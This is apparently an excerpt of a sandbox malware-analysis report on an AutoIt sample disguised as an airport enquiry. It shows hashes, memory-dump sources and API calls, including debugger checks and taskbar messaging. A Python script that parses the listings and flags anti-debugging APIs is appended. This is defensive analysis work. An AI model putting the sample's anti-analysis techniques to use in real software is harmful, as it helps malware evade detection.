            • Opcode ID: 9d42ea54a476f64287e6b8682a94f70be6e61d0b3557334badd8ca76dff028ef
            • Instruction ID: 6638e8a0cbf60d505f011be5b4e5767a2068d7609bd39d782940c8f92c7956b2
            • Opcode Fuzzy Hash: 9d42ea54a476f64287e6b8682a94f70be6e61d0b3557334badd8ca76dff028ef
            • Instruction Fuzzy Hash: 05018475A411047BCB04FAA0C992AFF77A8DB11700F2401167A1263291DB619F0CA275
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ClassName_wcscmp
            • String ID: #32770
            • API String ID: 2292705959-463685578
            • Opcode ID: 33ac10eea4ad0258a05f3bfb2bd0b6b689891c49c8ba6cf3e34e49cdd9f32b98
            • Instruction ID: a47d2ae107790e37f04b654c65340180eb6a17c0d6e5e308d7b3c40174409d03
            • Opcode Fuzzy Hash: 33ac10eea4ad0258a05f3bfb2bd0b6b689891c49c8ba6cf3e34e49cdd9f32b98
            • Instruction Fuzzy Hash: 10E06833A0032D2BE3209B9AAC09FA7F7ACEB41731F00006BFD14D3140E660AA448BF1
            APIs
            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00CD81CA
              • Part of subcall function 00CA3598: _doexit.LIBCMT ref: 00CA35A2
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Message_doexit
            • String ID: AutoIt$Error allocating memory.
            • API String ID: 1993061046-4017498283
            • Opcode ID: 673fc929902188fc9255b6bca534771b3b090d8c224bb323c9e5b702d896e841
            • Instruction ID: 45faea289e7d1ee26384f9f7cb520720907ff91cbbf98cb94bd9bbc7da9dae6d
            • Opcode Fuzzy Hash: 673fc929902188fc9255b6bca534771b3b090d8c224bb323c9e5b702d896e841
            • Instruction Fuzzy Hash: F6D05B323C535936D21533E97C07FCA75884B05B55F144016BB08955D38ED295D552FD
            APIs
              • Part of subcall function 00CBB564: _memset.LIBCMT ref: 00CBB571
              • Part of subcall function 00CA0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00CBB540,?,?,?,00C8100A), ref: 00CA0B89
            • IsDebuggerPresent.KERNEL32(?,?,?,00C8100A), ref: 00CBB544
            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00C8100A), ref: 00CBB553
            Strings
            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00CBB54E
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
• Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
            • API String ID: 3158253471-631824599
            • Opcode ID: 4c4b97718580f9d8946c7e7046699476863433354c77bca2b2d7c15083741f7c
            • Instruction ID: 34b75b05e1d4907416a45ef051d35df14a1ef13c43ae6c380e07193e34056b11
            • Opcode Fuzzy Hash: 4c4b97718580f9d8946c7e7046699476863433354c77bca2b2d7c15083741f7c
            • Instruction Fuzzy Hash: 7DE039B02003118FD730DF28E5083827AE0AB01758F14892CF456C2760D7B4E848CB72
            APIs
            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00D05BF5
            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00D05C08
              • Part of subcall function 00CE54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CE555E
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
• Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: FindMessagePostSleepWindow
            • String ID: Shell_TrayWnd
            • API String ID: 529655941-2988720461
            • Opcode ID: bb0df3198786cded7a8e01c212989c5bcc9c3597097f0839115d73e7acd155c0
            • Instruction ID: 6460ef697ff2d093fdd8e95886caa072820ec9c4995cddda620c62afa6565db2
            • Opcode Fuzzy Hash: bb0df3198786cded7a8e01c212989c5bcc9c3597097f0839115d73e7acd155c0
            • Instruction Fuzzy Hash: 53D01231388311BBE778BB70EC0FFD76A14AB10B51F100839B749EA2D0D9E45800C660
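The three function entries above each carry an "APIs" listing in the same fixed shape (a direct call as `Api.MODULE(args), ref: ADDR`, an indirect one as `Part of subcall function ADDR: Api.MODULE(args) ref: ADDR`). The following is an added example, not part of the Joe Sandbox report or its tooling: it parses that listing into call records, flags the entry that calls IsDebuggerPresent and OutputDebugStringW, and decodes the message constant in the PostMessageW call to Shell_TrayWnd. The sample text is constructed from the entries above; the anti-analysis watchlist and the window-message table are this example's own choices, not something the report defines, and the comma split of arguments is a heuristic since the report does not quote string arguments.

```python
"""Parse per-function "APIs" listings from a Joe Sandbox disassembly report.

Added example, not Joe Sandbox code. SAMPLE is constructed from the report
entries; ANTI_ANALYSIS and WINDOW_MESSAGES are this example's assumptions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: the three entries above, trimmed to headers and bullets.
SAMPLE = """\
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00CD81CA
  • Part of subcall function 00CA3598: _doexit.LIBCMT ref: 00CA35A2
Strings
Memory Dump Source
APIs
  • Part of subcall function 00CBB564: _memset.LIBCMT ref: 00CBB571
  • Part of subcall function 00CA0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00CBB540,?,?,?,00C8100A), ref: 00CA0B89
• IsDebuggerPresent.KERNEL32(?,?,?,00C8100A), ref: 00CBB544
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00C8100A), ref: 00CBB553
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00CBB54E
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00D05BF5
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00D05C08
  • Part of subcall function 00CE54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CE555E
"""

HEX = r"[0-9A-Fa-f]+"
# Direct call:   • Api.MODULE(args), ref: ADDR      (args are optional, e.g. _doexit.LIBCMT)
DIRECT_RE = re.compile(rf"^•\s+(\w+)\.(\w+)(?:\((.*)\))?,?\s+ref:\s*({HEX})$")
# Indirect call: • Part of subcall function CALLEE: Api.MODULE(args), ref: ADDR
SUBCALL_RE = re.compile(
    rf"^•\s+Part of subcall function ({HEX}):\s+(\w+)\.(\w+)(?:\((.*)\))?,?\s+ref:\s*({HEX})$"
)

# Watchlist (assumption): APIs the report's Signatures section ties to anti-debugging
# plus common companions. Timing APIs (GetTickCount, rdtsc) are left out as too noisy.
ANTI_ANALYSIS = {
    "IsDebuggerPresent", "CheckRemoteDebuggerPresent", "NtQueryInformationProcess",
    "OutputDebugStringA", "OutputDebugStringW", "BlockInput",
}
# Well-known Win32 message constants used by decode_window_message().
WINDOW_MESSAGES = {0x0010: "WM_CLOSE", 0x0111: "WM_COMMAND", 0x0112: "WM_SYSCOMMAND"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: str                           # address of the call instruction
    via_subcall: Optional[str] = None  # callee address when the call happens inside a subcall


def _split_args(raw: Optional[str]) -> list[str]:
    # Heuristic: the report does not quote strings, so a string argument that
    # itself contains a comma would be split. None of the sample strings do.
    return [] if raw is None else raw.split(",")


def parse_entries(text: str) -> list[list[ApiCall]]:
    """Return one list of ApiCall per function entry; each entry starts at an 'APIs' header."""
    entries: list[list[ApiCall]] = []
    in_apis = False
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            entries.append([])
            in_apis = True
            continue
        if not line.startswith("•"):
            in_apis = False  # any other header (Strings, Memory Dump Source, ...) ends the list
            continue
        if not in_apis:
            continue
        m = SUBCALL_RE.match(line)
        if m:
            entries[-1].append(ApiCall(m.group(2), m.group(3), _split_args(m.group(4)), m.group(5), m.group(1)))
            continue
        m = DIRECT_RE.match(line)
        if m:
            entries[-1].append(ApiCall(m.group(1), m.group(2), _split_args(m.group(3)), m.group(4)))
    return entries


def flag_anti_analysis(entries: list[list[ApiCall]]) -> list[tuple[int, list[tuple[str, str]]]]:
    """Entry indexes (with (api, call-site) pairs) that touch a watchlisted API."""
    findings = []
    for idx, calls in enumerate(entries):
        hits = [(c.api, c.ref) for c in calls if c.api in ANTI_ANALYSIS]
        if hits:
            findings.append((idx, hits))
    return findings


def decode_window_message(call: ApiCall) -> Optional[str]:
    """Name the Msg argument of a Post/SendMessage call; unknown values come back as hex."""
    if call.api not in {"PostMessageW", "PostMessageA", "SendMessageW", "SendMessageA"}:
        return None
    if len(call.args) < 2:
        return None
    try:
        msg = int(call.args[1], 16)
    except ValueError:
        return None
    return WINDOW_MESSAGES.get(msg, f"0x{msg:04X}")


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    for idx, hits in flag_anti_analysis(parsed):
        print(f"entry {idx}: anti-analysis APIs {hits}")
    for call in parsed[2]:
        name = decode_window_message(call)
        if name:
            print(f"{call.api} at {call.ref}: Msg={name}, wParam={call.args[2]}")
```

Run against the sample, the second entry is reported for IsDebuggerPresent at 00CBB544 and OutputDebugStringW at 00CBB553, and the PostMessageW at 00D05C08 decodes to WM_COMMAND. The wParam 00000197 is printed but not named, since the report does not say which taskbar command it selects.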